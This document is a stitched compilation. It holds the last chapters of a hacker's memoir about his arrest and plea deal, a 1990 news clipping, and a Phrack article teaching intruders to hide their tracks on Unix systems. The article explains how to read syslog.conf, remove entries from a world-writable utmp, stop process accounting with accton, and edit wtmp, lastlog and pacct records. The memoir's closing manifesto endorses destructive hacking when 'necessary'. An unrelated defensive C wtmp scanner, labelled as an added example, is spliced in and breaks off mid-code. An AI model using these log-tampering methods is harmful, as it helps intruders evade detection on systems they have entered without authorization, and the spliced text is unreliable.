Having been arrested, we were at last eligible for legal counsel. We went to the yellow pages and started dialing. We started with the attorneys with colored half-page ads. Even from those advertising "Reasonable Rates," we received figures I will not quote for fear of violating obscenity statutes. Going to the quarter-page ads, then the red-lettered names, then the schmucks with nothing but names, we received the same sort of numbers. Finally talking to the _pro bono_ attorneys, we found that we were entitled to a reduction in rates of almost fifty per cent. This generosity brought the best price down to around three thousand dollars, which was three thousand dollars more than we could afford.

So we contacted the public defender's office. Friends told me that a five thousand dollar attorney is worse, even, than a public defender; and that it takes at least twenty thousand to retain an attorney capable of winning anything but the most open-and-shut criminal case. After a certain amount of bureaucratic runaround, we were assigned two attorneys. One, Deborah Lux, was the Assistant Chief Public Defender; the other, Dale's attorney, was Bradley Lunsford, a sharp, young attorney who seemed too good to be true.

We discussed the case with our new attorneys, and were told that the best action we could take to defend ourselves was to do nothing. This is true. Anything we had attempted in our own defense, with the exception of contacting the complaining party, had been harmful to our case. Any discussions we had with the police were taped and examined for anything incriminating.
A letter to the district attorney was ignored entirely. Do absolutely nothing without legal counsel. Most legal counsel will advise you to do nothing. Legal counsel has more leverage than you do, and can make binding deals with the police. You can't.

We discussed possible defenses. As none of the systems into which I had intruded had any sort of warning against unauthorized access, this was considered a plausible defense. The almost exclusive use of 'guest' accounts was also beneficial.

A more technical issue is the Best Evidence rule. We wondered whether a court would allow hardcopy as evidence, when the original document was electronic. As it happens, hardcopy is often admissible due to loopholes in this rule, even though hardcopy is highly susceptible to falsification by the police; and most electronic mail has no built-in authentication to prove identity. Still, without anything more damaging than electronic mail, a case would be very difficult to prosecute. However, with what almost amounted to a taped confession, the chance of a conviction was increased.

We went over the arrest warrant affidavit, and my corrections to it, with a mixture of amusement and consternation.

"So what do you think of this?" asked Dale.

After a moment of thought, Deb Lux said: "This is gibberish."

"I just had a case where a guy pumped four bullets into his brother-in-law, just because he didn't like him, and the arrest warrant for that was two pages long. One and a half, really," said Brad.

"Does this help us, at all, that this arrest warrant is just demonstrably false, that it literally has over a hundred mistakes in it?" I asked.

"Yeah, that could help," said Brad.

We agreed to meet at the arraignment.

XIV. The Stairwells of Justice

The arraignment was a simple procedure, and was over in five minutes. Prior to our arraignment, five other people were arraigned on charges of varying severity, mainly such heinous crimes as smoking marijuana or vandalism.
Dale stepped in front of the desk first. He was informed of the charges against him, asked if he understood them, and that was it. I stepped up, but when the judge asked me whether I understood the charges, I answered that I didn't, and that the charges were incomprehensible to a sane human being. I had hoped for some sort of response, but that was it for me, too.

A trial date was set, once again months in advance. A week before the date arrived, it was once again postponed. During this week, we were informed that Dale's too-good-to-be-true attorney, Brad Lunsford, had gone over to the District Attorney's office. He was replaced by Dave Crowley, the Chief District Attorney, a perpetually bitter, pock-faced older man with the demeanor and bearing of an angry accountant. Crowley refused to consider any of the strategies we had discussed at length with Brad and Deb. Dale was understandably irate at the sudden change, as was I, for when Deb and I were attempting to discuss the case he would interject rude comments. Finally, after some particularly snide remark, I told him to fuck off, or something similarly pleasant, and left. Dale and I tried to limit our dealings to Deb, and it was Deb who handled both of our cases to the end, for which I thank God.

The day arrived. We dressed quite sharply, Dale in new wool slacks and jacket. I dressed in a new suit as well, and inserted a carnation in my buttonhole as a gesture of contempt for the proceedings. Dale looked so sharp that he was mistaken for an attorney twice. I did not share this distinction, but I looked sharp enough. I had shaved my beard a month previously after an error in trimming, so I looked presentable. We realized that judges base their decisions as much on your appearance as on what you say. We did not intend to say anything, so appearance was of utmost importance.

We arrived at about the same time as at least thirty assorted computer security professionals, police, witnesses and ancillary court personnel.
Dhamir Mannai and Richard Devon were there as well, and we exchanged greetings. Richard Devon was optimistic about the outcome, as was Dhamir Mannai. The computer security people gathered into a tight, paranoid knot, and Richard Devon and Dhamir Mannai stood about ten feet away from them, closer to us than to them. Robert Owens, Angela Thomas, Bryan Jensen, and Dan Ehrlich were there, among others. They seemed nervous and ill-at-ease in their attempt at formal dress. Occasionally, one or another would glare at us, or at Devon and Mannai. I smiled and waved. A discussion of some sort erupted among the computer security people, and a bailiff emerged and requested that they be quiet. The second time this was necessary, he simply told them to shut up, and told them to take their discussion to the stairwells. Dale and I had known of the noise policy for some time, and took all attorney-client conferences to the stairwells, which were filled at all times with similar conferences. It seemed that all the hearings and motions were just ceremonies without meaning; all the decisions had been made, hours before, in the stairwells of justice. Finally Deb Lux arrived, with a sheaf of documents, and immediately left, saying that she would return shortly. A little over twenty minutes later, she returned to announce that she had struck a deal with Eileen Tucker, the Assistant District Attorney. In light of the garbled nature of the police testimony, the spuriousness of the arrest warrant affidavit, the hostility of their main witness, Dhamir Mannai, and the difficulty of prosecuting a highly technical case, the Office of the District Attorney was understandably reluctant to prosecute us. I was glad not to have to deal with Eileen Tucker, a woman affectionately nicknamed by other court officials "The Wicked Witch of the West." 
With her pallid skin, and her face drawn tightly over her skull as if she had far too much plastic surgery, this seemed an adequately descriptive name, both as to appearance and personality.

The deal was Advanced Rehabilitative Disposition, a pre-trial diversion in which you effectively receive probation and a fine, and charges are dismissed, leaving you with no criminal record. This is what first-time drunk drivers usually receive. It is essentially a bribe to get the cops off your back. The fines were approximately two thousand dollars apiece, with Dale arbitrarily receiving a fine two hundred dollars greater than mine.

After a moment of thought, we decided that the fines were too large. We turned down the deal, and asked her if she could get anything better than that. After a much shorter conference she returned, announcing that the fines had been dropped by about a third. Still unsatisfied, but realizing that the proceedings, trial, jury selection, delays, sentencing, motions of discovery and almost limitless writs and affidavits and appeals would take several more months, we agreed to the deal. It was preferable to more hellish legal proceedings.

We discussed the deal outside with Richard Devon; Dhamir Mannai had left, having pressing engagements both before and after his testimony had been scheduled. We agreed that a trial would probably have resulted in an eventual victory, but at what unaffordable cost? We had no resources or time for a prolonged legal battle, and no acceptable alternative to a plea-bargain.

XV. The End? Of Course Not; There Is No End

This, we assumed incorrectly, was the end. There was still a date for sentencing, and papers to be signed. Nevertheless, this was all a formality, and weeks distant. There was time to prepare for these proceedings. The hounds of spring were on winter's traces. Dale and I hoped to return to what was left of our lives, and to enjoy the summer. This hope was not to be fulfilled.
For, while entering the Electronic Music Lab one fine spring night, Andy Ericson [*], a locally-renowned musician, was halted by the University Police outside the window, as he prepared to enter. We quickly explained that we were authorized to be present, and immediately presented appropriate keys, IDs and other evidence that we were authorized to be in the Lab. Nevertheless, more quickly than could be imagined, the cops grabbed Andy and slammed him against a cruiser, frisking him for weapons. They claimed that a person had been sighted carrying a firearm on campus, and that they were investigating a call. No weapons were discovered. However, a small amount of marijuana and a tiny pipe were found on him. Interestingly, the police log in the paper the following day noted the paraphernalia bust, but there was no mention of any person carrying a firearm on campus. Andy, a mathematician pursuing a Master's Degree, was performing research in a building classified Secret, and thus required a security clearance to enter the area where he performed his research. His supervisor immediately yanked his security clearance, and this greatly jeopardized his chances of completing his thesis. This is, as with my suspicions of wiretapping, an incident in which circumstantial evidence seems to justify my belief that the police were, even then, continuing surveillance on my friends and on me. However, as with my wiretapping suspicions, there is a maddening lack of substantial evidence to confirm my belief beyond a reasonable doubt. Still, the police continued their series of visits to the Lab, under one ruse or another. Jeffery Jones, one night, threatened to arrest Dale for being in the Electronic Music Lab, though he had been informed repeatedly that Dale's access was authorized by the School of Music. Dale turned over his keys to Police Services the following day, resenting it bitterly. This, however, was not to be a victory for the cops, but a crushing embarrassment. 
While their previous actions had remained at least within the letter of the law and of university policy, this was egregious and obvious harassment, and was very quickly quashed. Bob Wilkins, the supervisor of the Electronic Music Lab; Burt Fenner, head of the Electronic Music division; and the Dean of the College of Arts and Architecture immediately drafted letters to the University Police objecting to this illegal action; as it is the professors and heads of departments who authorize keys, and not the University Police. The keys were returned within three days.

However, Jeffery was to vent his impotent rage in repeated visits to the Lab at late hours. On a subsequent occasion, he again threatened to arrest Dale, without providing any reason or justification for it. The police, Jeffery and others, always had some pretext for these visits, but the fact that these visits only occurred when Dale was present in the Lab, and that they visited no one else, seems to be solid circumstantial evidence that they were more than routine checkups.

Once the authorities become interested in you, the file is never closed. Perhaps it will sit in a computer for ten or twenty years. Perhaps it will never be accessed again. However, perhaps some day in the distant future the police will be investigating some unrelated incident, and will once again note your name. You were in the wrong building, or talked to the wrong person. Suddenly, their long-dormant interest in you has reawakened. Suddenly, they once again want you for questioning. Suddenly, once again, they pull your life out from under you.

This is the way democracies die, not by revolution or coups d'etat, not by the flowing of blood in the streets like water, as historical novelists so quaintly write. Democracies die by innumerable papercuts. Democracies die by the petty actions of petty bureaucrats who, like mosquitoes, each drain their little drop of life's blood until none is left.

XVI. Lightning Always Strikes the Same Place Twice

One day, Dale received in the mail a subpoena, which informed him that his testimony was required in the upcoming trial of Ron Gere, who had moved to Florida. The cops had charged him with criminal conspiracy in the creation of the Huang account at the Engineering Computer Lab. Now, not only was I guilty of being used as a weapon against a friend, but also guilty of this further complication, that the police were to use a friend of mine as a weapon against yet another friend.

It is interesting to note the manner in which the police use betrayal, deceit and infamous methods to prosecute crime. It is especially interesting to note the increased use of such methods in the prosecution of crimes with no apparent victim. Indeed, in this specific case, the only victim with a demonstrable loss testified against the police and for the accused.

Dale resolved to plead the Fifth to any question regarding Ron, and to risk contempt of court by doing so, rather than be used in this manner. This was not necessary. As it happened, Ron was to drive well over two thousand miles simply to sign a paper and receive ARD. The three of us commiserated, and then Ron was on his way back to Florida.

XVII. Sentencing

Dale and I reported to the appropriate courtroom for sentencing. In the hall, a young man, shackled and restrained by two police officers, was yelling: "I'm eighteen, and I'm having a very bad day!" The cops didn't bat an eye as they dragged him to the adjoining prison.

We sat. The presiding judge, the Hon. David C. Grine, surveyed with evident disdain a room full of criminals like us. Deborah Lux was there, once again serving as counsel. David Crowley was mercifully absent.

The judge briefly examined each case before him. For each case, he announced the amount of the fine, the time of probation, and banged his gavel. Immediately before he arrived at our case, he looked at a man directly to our left.
Instead of delivering the usual ARD sentence, he flashed a sadistic grin and said: "Two years jail." Dealing marijuana was the crime. The man's attorney objected. The judge said: "Okay, two years, one suspended." The attorney, another flunky from the public defender's office, sat down again. Two cops immediately dragged the man from the courtroom to take him to jail.

I noted that practically everyone in the room was poor, and those with whom I spoke were all uneducated. DUI was the most common offense.

Judge Grine came to our case, announced the expected sentence, and we reported upstairs to be assigned probation officers. I was disgusted with myself for having agreed to this arrangement, and perhaps this was why I was surly with the probation officer, Thomas Harmon. This earned me a visit to a court-appointed psychiatrist, to determine if I were mentally disturbed or on drugs. That I was neither was satisfied by a single interview, and no drug-testing was necessary; for which I am grateful, for I would have refused any such testing. Exercising this Fifth Amendment-guaranteed right is, of course, in this day considered to be an admission of guilt. The slow destruction of this right began with the government policy of "implied consent," by which one signs over one's Fifth Amendment rights against self-incrimination by having a driver's license, allowing a police officer to pull you over and test your breath for any reason or for no reason at all.

I later apologized to Thomas Harmon for my rudeness, as he had done me no disservice; indeed, a probation officer is, at least, in the business of keeping people out of jail instead of putting them there; and his behavior was less objectionable than that of any other police officer involved in my case.

Very shortly thereafter, realizing that I knew a large number of the local police on a first-name basis, I left the area, with the stated destination of Indiana.
I spent the next two years travelling, with such waypoints as New Orleans, Denver, Seattle and Casper, Wyoming; and did not touch a computer for three years, almost having a horror of them. I did not pay my fine in the monthly installments the court demanded. I ignored virtually every provision of my probation. I did not remain in touch with my probation officer, almost determined that my absence should be noticed. I did a lot of drugs, determined to obliterate all memory of my previous life. In Seattle, heroin was a drug of choice, so I did that for a while. Finally, I arrived at my stated destination, Indiana, with only about three months remaining in my probation, and none of my fines paid. Dale, without my knowledge, called my parents and convinced them to pay the fine. It took me a few days of thought to decide whether or not to accept their generous offer; I had not thought of asking them to pay the fine, sure that they would not. Perhaps I had done them a disservice in so assuming, but now I had to decide whether to accept their help. If my fines were not paid, my ARD would be revoked, and a new trial date would be set. I was half determined to return and fight this case, still ashamed of having agreed to such a deal under duress. However, after discussing it at exhaustive length with everyone I knew, I came to the conclusion that to do so would be foolish and quixotic. Hell, I thought, Thoreau did the same thing in a similar circumstance; why shouldn't I? I accepted my parents' offer. Three months later, I received a letter in the mail announcing that the case had been dismissed and my records expunged, with an annotation to the effect that records would be retained only to determine eligibility for any future ARD. I believe this to the same degree in which I believe that the NSA never performs surveillance on civilians. I have my doubts that the FBI eliminated all mention of me from their files. 
I shall decide after I file a Freedom of Information Act request and receive a reply. I now have a legitimate Internet account and due to my experiences with weak encryption am a committed cypherpunk and Clipper Chip proposal opponent. What is the moral to this story? Even now, when I have had several years to gain distance and perspective, there does not seem to be a clear moral; only several pragmatic lessons. I became enamored of my own brilliance, and arrogantly sure that my intelligence was invulnerability. I assumed my own immortality, and took a fall. This was not due to the intelligence of my adversaries, for the stupidity of the police was marvellous to behold. It was due to my own belief that I was somehow infallible. Good intentions are only as good as the precautions taken to ensure their effectiveness. There is always a Public Enemy Number One. As the public's fickle attention strays from the perceived menace of drug use, it will latch on to whatever new demon first appears on television. With the growing prevalence of hatchet jobs on hackers in the public media, it appears that hackers are to be the new witches. It is advisable, then, that we avoid behavior which would tend to confirm the stereotypes. For every Emmanuel Goldstein or R. U. Sirius in the public eye, there are a dozen Mitnicks and Hesses; and, alas, it is the Mitnicks and Hesses who gain the most attention. Those who work for the betterment of society are much less interesting to the media than malicious vandals or spies. In addition, it is best to avoid even the appearance of dishonesty in hacking, eschewing all personal gain. Phreaking or hacking for personal gain at the expense of others is entirely unacceptable. Possibly bankrupting a small company through excessive telephone fraud is not only morally repugnant, but also puts money into the coffers of the monopolistic phone companies that we despise. 
The goal of hacking is, and always has been, the desire for full disclosure of that information which is unethically and illegally hidden by governments and corporations; add to that a dash of healthy curiosity and a hint of rage, and you have a solvent capable of dissolving the thickest veils of secrecy. If destructive means are necessary, by all means use them; but be sure that you are not acting from hatred, but from love. The desire to destroy is understandable, and I sympathize with it; anyone who can not think of a dozen government bodies which would be significantly improved by their destruction is probably too dumb to hack in the first place. However, if that destruction merely leads to disproportionate government reprisals, then it is not only inappropriate but counterproductive. The secrecy and hoarding of information so common in the hacker community mirrors, in many respects, the secrecy and hoarding of information by the very government we resist. The desired result is full disclosure. Thus, the immediate, anonymous broadband distribution of material substantiating government and corporate wrongdoing is a mandate. Instead of merely collecting information and distributing it privately for personal amusement, it must be sent to newspapers, television, electronic media, and any other means of communication to ensure both that this information can not be immediately suppressed by the confiscation of a few bulletin board systems and that our true motives may be discerned from our public and visible actions. Our actions are not, in the wake of Operation Sun-Devil and the Clipper Chip proposal, entirely free. The government has declared war on numerous subsections of its own population, and thus has defined the terms of the conflict. The War on Drugs is a notable example, and we must ask what sort of a government declares war on its own citizens, and act accordingly. Those of us who stand for liberty must act while we still can. It is later than we think. 
"In Germany they first came for the Communists and I didn't speak up because I wasn't a Communist. Then they came for the Jews, and I didn't speak up because I wasn't a Jew. Then they came for the trade unionists, and I didn't speak up because I wasn't a trade unionist. Then they came for the Catholics, and I didn't speak up because I was a Protestant. Then they came for me--and by that time no one was left to speak up."

Martin Niemoeller

"They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety."

Benjamin Franklin

---------

APPENDIX A

[From cert-clippings]

Date: Sat, 10 Mar 90 00:22:22 GMT
From: thomas@shire.cs.psu.edu (Angela Marie Thomas)
Subject: PSU Hackers thwarted

The Daily Collegian
Wednesday, 21 Feb 1990

Unlawful computer use leads to arrests
ALEX H. LIEBER, Collegian Staff Writer

Two men face charges of unlawful computer use, theft of services in a preliminary hearing scheduled for this morning at the Centre County Court of Common Pleas in Bellefonte.

Dale Garrison, 111 S. Smith St., and Robert W. Clark, 201 Twin Lake Drive, Gettysburg, were arrested Friday in connection with illegal use of the University computer system, according to court records.

Garrison, 36, is charged with the theft of service, unlawful computer use and criminal conspiracy. Clark, 20, is charged with multiple counts of unlawful computer use and theft of service.

[...]

Clark, who faces the more serious felony charges, allegedly used two computer accounts without authorization from the Center of Academic Computing or the Computer Science Department and, while creating two files, erased a file from the system.

[...]

When interviewed by University Police Services, Clark stated in the police report that the file deleted contained lists of various groups under the name of "ETZGREEK." Clark said the erasure was accidental, resulting from an override in the file when he tried to copy it over onto a blank file.
According to records, Clark is accused of running up more than $1000 in his use of the computer account. Garrison is accused of running up more than $800 of computer time.

Police began to investigate allegations of illegal computer use in November when Joe Lambert, head of the university's computer department, told police a group of people was accessing University computer accounts and then using those accounts to gain access to other computer systems.

Among the systems accessed was Internet, a series of computers hooked to computer systems in industry, education and the military, according to records.

The alleged illegal use of the accounts was originally investigated by a Computer Emergency Response Team at Carnegie-Mellon University, which assists other worldwide computer systems in investigating improper computer use.

Matt Crawford, technical contact in the University of Chicago computer department discovered someone had been using a computer account from Penn State to access the University of Chicago computer system.

==Phrack Magazine==

Volume Four, Issue Forty-Three, File 14 of 27

#!/bin/sh
# Playing Hide and Seek, Unix style.
# By Phreak Accident
#
# A "how-to" in successfully hiding and removing your electronic footprints
# while gaining unauthorized access to someone else's computer system (Unix in
# this case).

# Start counting ..

Hmm. Sucks don't it? Breaking into a system but only to have your access cut off the next day. Right before you had the chance to download that 2 megabyte source code file you have been dying to get all year.

Why was the access cut? Damn, you forgot to nuke that .rhosts file that you left in the root directory. Or maybe it was the wtmp entries you didn't bother to edit. Or perhaps the tcp_wrapper logs that you didn't bother to look for. Whatever it was, it just screwed your access and perhaps, just got you busted.
---- Simulated incident report follows:

From: mark@abene.com (Mark Dorkenski)
Message-Id: <9305282324.AA11445@jail.abene.com>
To: incident-report@cert.org
Subject: Cracker Breakin
Status: RO

To whom it may concern,

Last night 2 of our machines were penetrated by an unauthorized user. Apparently the cracker (or crackers) involved didn't bother to clean up after they left.

The following are logs generated from the time the break-in occurred.

[/usr/adm/wtmp]:

oracle    ttyp1    192.148.8.15    Tue May 11 02:12 - 04:00  (02:12)
sync      ttyp2    192.148.8.15    Tue May 11 01:47 - 01:47  (00:00)
robert    console                  Mon May 10 06:00 - 04:15  (22:14)
reboot    ~                        Mon May 10 05:59
shutdown  ~                        Sun May 9 11:04

[/usr/adm/messages]:

May 11 02:02:54 abene.com login: 3 LOGIN FAILURES FROM 192.148.8.15
May 11 02:00:32 abene.com login: 4 LOGIN FAILURES FROM 192.148.8.15

[/usr/adm/pacct]:

ls      -  oracle  ttyp1  0.00 secs Tue May 2 19:37
cat     -  oracle  ttyp1  0.00 secs Tue May 2 19:37
ls      -  oracle  ttyp1  0.00 secs Tue May 2 19:37
ls      -  oracle  ttyp1  0.00 secs Tue May 2 19:37
rdist   -  root    ttyp1  0.00 secs Tue May 2 19:37
sh      -  root    ttyp0  0.00 secs Tue May 2 19:37
ed      -  root    ttyp0  0.00 secs Tue May 2 19:37
rlogin  -  root    ttyp0  0.00 secs Tue May 2 19:37
ls      -  root    ttyp0  0.00 secs Tue May 2 19:37
more    -  root    ttyp0  0.00 secs Tue May 2 19:34

We have found and plugged the areas of vulnerability and have restored original binaries back to the system. We have already informed the proper authorities of the breakin, including the domain contact at the remote host in question.

Can you please relay any information regarding incident reports in our area?

Mark Dorkenski
Network Operations

---- End of incident report

Hey, it's human nature to be careless and lazy. But, when you're a hacker, and you're illegally breaking into computer systems this isn't a luxury that you can afford. Your efforts in penetrating have to be exact, concise, sharp, witty and skillful. You have to know when to retreat, run, hide, pounce or spy.
Let us put it this way, when you get your feet muddy and walk on new carpet without cleaning it up, you're gonna get spanked. I can't tell you how many times I've seen a hacker break into a system and leave their muddy footprints all over the system. Hell, a quarter of the hosts on the Internet need to be steam-cleaned.

This is sad. Especially since you could have had the ability to do the washing yourself. Why bother cracking systems if you leave unauthorized login messages on the console for the administrators? Beats me.

This article is about hiding your access--the little tricks of the trade that keep you unnoticed and hidden from that evil bastard, the system administrator.

I should probably start by explaining exactly where common accounting/log files are kept and their roles in keeping/tracking system information.

# Drinking jolt and jerking the logs

Syslog(3), the "Big Daddy" of logging daemons, is the master of all system accounting and log reporting. Most system components and applications depend on syslogd to deliver the information (accounting, errors, etc.) to the appropriate place. Syslog (syslogd) reads a configuration file (/etc/syslog.conf) on startup to determine what facilities it will support.

Syslog usually has the following facilities and priorities:

Facilities: kern user mail daemon auth syslog lpr news uucp
Priorities: emerg alert crit err warning notice info debug

Facilities are the types of accounting that occur and priorities are the level of urgency that the facilities will report. Most facilities are divided and logged into separate accounting files. The most common are daemon, auth, syslog, and kern.

Priorities are encoded as a facility and a level. The facility usually describes the part of the system generating the message. Priorities are defined in .

In order to by-pass or suspend system accounting it is necessary to understand how it works.
With syslog, it is important to know how to read and determine where accounting files are delivered. This entails understanding how syslog configures itself for operation.

# Reading and understanding /etc/syslog.conf.

Lines in the configuration file have a selector to determine the message priorities to which the line applies and an action. The action fields are separated from the selector by one or more tabs.

Selectors are semicolon separated lists of priority specifiers. Each priority has a facility describing the part of the system that generated the message, a dot, and a level indicating the severity of the message. Symbolic names could be used. An asterisk selects all facilities. All messages of the specified level or higher (greater severity) are selected. More than one facility may be selected using commas to separate them. For example:

     *.emerg;mail,daemon.crit

selects all facilities at the emerg level and the mail and daemon facilities at the crit level.

Known facilities and levels recognized by syslogd are those listed in syslog(3) without the leading ``LOG_''. The additional facility ``mark'' has a message at priority LOG_INFO sent to it every 20 minutes (this may be changed with the -m flag). The ``mark'' facility is not enabled by a facility field containing an asterisk. The level ``none'' may be used to disable a particular facility. For example,

     *.debug;mail.none

sends all messages except mail messages to the selected file.

The second part of each line describes where the message is to be logged if this line is selected. There are four forms:

o  A filename (beginning with a leading slash). The file will be opened in append mode.

o  A hostname preceded by an at sign (``@''). Selected messages are forwarded to the syslogd on the named host.

o  A comma separated list of users. Selected messages are written to those users if they are logged in.

o  An asterisk. Selected messages are written to all logged-in users.
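An added example (not part of the original article and not syslogd's own code) that applies the selector rules above to this article's sample configuration, which is reproduced in the next paragraph: it lists every action a given facility.level message reaches and reports whether one of them is an `@host` forward, in which case a copy of the message is held by another machine's syslogd. The function names are hypothetical, and the per-facility threshold model, where a later specifier overrides an earlier one for the same facility, is an assumption drawn from how `*.debug;mail.none` is described.

```c
#include <stdio.h>
#include <string.h>

/* Names as listed in the article; levels run from most to least urgent. */
static const char *LEVELS[] = { "emerg", "alert", "crit", "err",
                                "warning", "notice", "info", "debug" };
static const char *FACILITIES[] = { "kern", "user", "mail", "daemon", "auth",
                                    "syslog", "lpr", "news", "uucp", "mark" };
enum { NLEVELS = 8, NFAC = 10, MARK = 9, NOPRI = -1 };

/* The article's sample syslog.conf as selector/action pairs. */
static const struct { const char *selector, *action; } RULES[] = {
    { "kern,mark.debug",      "/dev/console" },
    { "*.notice;mail.info",   "/usr/spool/adm/syslog" },
    { "*.crit",               "/usr/adm/critical" },
    { "kern.err",             "@phantom.com" },
    { "*.emerg",              "*" },
    { "*.alert",              "erikb,netw1z" },
    { "*.alert;auth.warning", "ralph" },
};
enum { NRULES = sizeof RULES / sizeof RULES[0] };

static int lookup(const char *s, size_t len, const char **tab, int n)
{
    for (int i = 0; i < n; i++)
        if (strlen(tab[i]) == len && memcmp(tab[i], s, len) == 0) return i;
    return -1;
}

/* Turn a selector into one threshold per facility; -1 on a syntax error. */
static int compile_selector(const char *sel, int thresh[NFAC])
{
    for (int i = 0; i < NFAC; i++)
        thresh[i] = NOPRI;
    for (const char *p = sel; *p; ) {
        size_t speclen = strcspn(p, ";");
        const char *dot = memchr(p, '.', speclen);
        if (dot == NULL || dot == p) return -1;
        size_t lvllen = speclen - (size_t)(dot + 1 - p);
        int pri = NOPRI;                      /* "none" disables the facility */
        if (!(lvllen == 4 && memcmp(dot + 1, "none", 4) == 0) &&
            (pri = lookup(dot + 1, lvllen, LEVELS, NLEVELS)) < 0)
            return -1;
        for (const char *f = p; f < dot; ) {
            size_t flen = strcspn(f, ",.");
            if (flen == 0) return -1;
            if (flen == 1 && *f == '*') {     /* every facility except mark */
                for (int i = 0; i < NFAC; i++)
                    if (i != MARK) thresh[i] = pri;
            } else {
                int fi = lookup(f, flen, FACILITIES, NFAC);
                if (fi < 0) return -1;
                thresh[fi] = pri;
            }
            f += flen + (f[flen] == ',');     /* step over the comma, if any */
        }
        p += speclen + (p[speclen] == ';');
    }
    return 0;
}

/* 1 if the selector selects facility.level, 0 if not, -1 on bad input. */
int selector_matches(const char *sel, const char *facility, const char *level)
{
    int thresh[NFAC];
    int fi = lookup(facility, strlen(facility), FACILITIES, NFAC);
    int li = lookup(level, strlen(level), LEVELS, NLEVELS);
    if (fi < 0 || li < 0 || compile_selector(sel, thresh) < 0) return -1;
    return thresh[fi] != NOPRI && li <= thresh[fi];   /* level or more urgent */
}

/* Collect the actions of every rule that selects the message. */
int route(const char *facility, const char *level, const char *out[], int max)
{
    int n = 0;
    for (int i = 0; i < NRULES && n < max; i++)
        if (selector_matches(RULES[i].selector, facility, level) == 1)
            out[n++] = RULES[i].action;
    return n;
}

/* An @host action means another machine's syslogd also holds the message. */
int has_remote_copy(const char *facility, const char *level)
{
    const char *out[NRULES];
    int n = route(facility, level, out, NRULES);
    for (int i = 0; i < n; i++)
        if (out[i][0] == '@') return 1;
    return 0;
}

int main(void)
{
    const char *out[NRULES];
    int n = route("kern", "err", out, NRULES);
    for (int i = 0; i < n; i++)
        printf("kern.err -> %s\n", out[i]);
    printf("auth.warning remote copy: %d\n", has_remote_copy("auth", "warning"));
    return 0;
}
```

With this configuration only kernel messages at err or above leave the host; login failures reported through auth exist in local files and on a user's terminal only, so forwarding auth to a loghost is the change that keeps an independent record.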
For example, the configuration file:

     kern,mark.debug	/dev/console
     *.notice;mail.info	/usr/spool/adm/syslog
     *.crit	/usr/adm/critical
     kern.err	@phantom.com
     *.emerg	*
     *.alert	erikb,netw1z
     *.alert;auth.warning	ralph

logs all kernel messages and 20 minute marks onto the system console, all notice (or higher) level messages and all mail system messages except debug messages into the file /usr/spool/adm/syslog, and all critical messages into /usr/adm/critical; kernel messages of error severity or higher are forwarded to ucbarpa. All users will be informed of any emergency messages, the users ``erikb'' and ``netw1z'' will be informed of any alert messages, or any warning message (or higher) from the authorization system.

Syslogd creates the file /etc/syslog.pid, if possible, containing a single line with its process id; this is used to kill or reconfigure syslogd.

# System login records

There are three basic areas (files) in which system login information is stored. These areas are:

     /usr/etc/wtmp
     /usr/etc/lastlog
     /etc/utmp

The utmp file records information about who is currently using the system. The file is a sequence of entries with the following structure declared in the include file (/usr/include/utmp.h):

     struct utmp {
          char ut_line[8];    /* tty name */
          char ut_name[8];    /* user id */
          char ut_host[16];   /* host name, if remote */
          long ut_time;       /* time on */
     };

This structure gives the name of the special file associated with the user's terminal, the user's login name, and the time of the login in the form of time(3C). This will vary from platform to platform. Since Sun Microsystems ships SunOS with a world writable /etc/utmp, you can easily take yourself out of any who listing.

The wtmp file records all logins and logouts. A null username indicates a logout on the associated terminal.
Furthermore, the terminal name `~' indicates that the system was rebooted at the indicated time; the adjacent pair of entries with terminal names `|' and `{' indicate the system maintained time just before and just after a date command has changed the system's idea of the time.

Wtmp is maintained by login(1) and init(8). Neither of these programs creates the file, so if it is removed or renamed record-keeping is turned off. Wtmp is used in conjunction with the /usr/ucb/last command.

/usr/adm/lastlog is used by login(1) for storing previous login dates, times, and connection locations. The structure for lastlog is as follows:

     struct lastlog {
          time_t ll_time;
          char ll_line[8];
          char ll_host[16];
     };

The structure for lastlog is quite simple. One entry per UID, and it is stored in UID order.

Creating a lastlog and wtmp editor is quite simple. Example programs are appended at the end of this file.

# System process accounting

Usually, the more security-conscious systems will have process accounting turned on which allows the system to log every process that is spawned. /usr/adm/acct or /usr/adm/pacct are the usual logfiles that store the accounting data. These files can grow quite large as you can imagine, and are sometimes shrunk by other system applications and saved in a compressed format as /usr/adm/savacct or something similar.

Usually, if the accounting file is there with a 0 byte length then you can rest assured that they are not keeping process accounting records. If they are however, there are really only two methods of hiding yourself from this form of accounting. One, you can suspend or stop process accounting (which is usually done with the "accton" command) or you can edit the existing process logfile and "wipe" your incriminating records.
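An added example, written from the administrator's side and not part of the original article: the wtmp rules given in the login records section (null username means logout, `~' means reboot, `|' and `{' bracket a date change), together with the fact that the editors appended to this article blank a record in place, give three consistency checks that can be run over a wtmp file. The struct uses the article's field layout with `ut_time` narrowed to 32 bits (an assumption, to fix the record size), all function names are hypothetical, and the sample records are constructed; an orphan logout also occurs legitimately at the start of a rotated file, so findings are leads to follow up, not proof.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Record layout from the article. ut_time is narrowed to 32 bits here
 * (assumption) so a record is 36 bytes whatever the host's long is. */
struct old_utmp {
    char    ut_line[8];    /* tty name */
    char    ut_name[8];    /* user id; empty means logout */
    char    ut_host[16];   /* host name, if remote */
    int32_t ut_time;       /* time on */
};

struct wtmp_findings {
    int records;           /* records examined */
    int zeroed;            /* records that are entirely zero bytes */
    int time_regressions;  /* timestamp earlier than the record before it */
    int orphan_logouts;    /* logout on a line with no login in this file */
};

enum { MAX_OPEN = 64 };

void scan_wtmp(const struct old_utmp *rec, int n, struct wtmp_findings *out)
{
    static const struct old_utmp zero;       /* all-zero reference record */
    char open_line[MAX_OPEN][8];             /* lines with a session open */
    int nopen = 0, have_time = 0;
    int32_t last = 0;

    memset(out, 0, sizeof *out);
    out->records = n;
    for (int i = 0; i < n; i++) {
        const struct old_utmp *r = &rec[i];
        /* login(1) and init(8) always fill in a line and a time, so an
         * empty record inside the file was overwritten after the fact. */
        if (memcmp(r, &zero, sizeof zero) == 0) { out->zeroed++; continue; }

        /* `|' and `{' bracket a date(1) change; time may jump there. */
        int date_change = r->ut_line[0] == '|' || r->ut_line[0] == '{';
        if (have_time && !date_change && r->ut_time < last)
            out->time_regressions++;
        last = r->ut_time;
        have_time = 1;
        if (date_change) continue;
        if (r->ut_line[0] == '~') { nopen = 0; continue; }  /* reboot/shutdown */

        int k = 0;
        while (k < nopen && memcmp(open_line[k], r->ut_line, 8) != 0) k++;
        if (r->ut_name[0] != '\0') {                         /* login */
            if (k == nopen && nopen < MAX_OPEN)
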